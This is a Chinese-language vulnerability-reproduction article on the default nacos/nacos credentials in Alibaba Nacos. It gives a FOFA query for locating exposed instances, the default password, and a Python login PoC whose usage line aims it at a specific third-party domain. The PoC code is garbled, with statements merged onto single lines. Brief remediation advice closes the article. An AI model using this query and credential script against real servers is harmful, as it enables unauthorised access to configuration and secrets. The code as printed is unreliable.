Alibaba Nacos存在默认弱口令漏洞

文章目录

Alibaba Nacos存在默认弱口令漏洞

1.Alibaba Nacos简介

微信公众号搜索：南风漏洞复现文库
南风网络安全公众号首发

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称，一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。

2.漏洞描述

Nacos是阿里巴巴最新开源的项目。 Alibaba Nacos存在弱口令漏洞。攻击者利用默认弱密码登录系统后台，获取敏感信息。

3.影响版本

Alibaba Nacos 1.2.1
Alibaba Nacos 1.3.2
Alibaba Nacos 1.4.0

4.fofa查询语句

app=“NACOS”

5.漏洞复现

账号密码: nacos nacos

6.POC&EXP

用法 python3 .\poc.py https://nacos.meiguanjia.net/

#!usr/bin/env python# *-* coding:utf-8 *-*import requests
import json
import sys
import urllib3
urllib3.disable_warnings()defpoc(arg):
    vuln_url = arg +'v1/auth/users/login'
    headers ={"User-Agent":"Nacos-Server","Content-Type":"application/x-www-form-urlencoded"}
    postdata="username=nacos&password=nacos"try:
        r = requests.post(vuln_url,headers=headers,verify=False,timeout=20,allow_redirects=False,data=postdata)if r.status_code ==200and"accessToken"in r.text:print('存在漏洞：'+vuln_url)except Exception as e:print('出错：'+str(e))pass
            
        
url=sys.argv[1]        
poc(url)

7.整改意见

1、厂商已提供漏洞修补方案，请关注厂商主页及时更新： https://nacos.io/zh-cn/
2、口令八位数以上，包括大小写字符，特殊字母，数字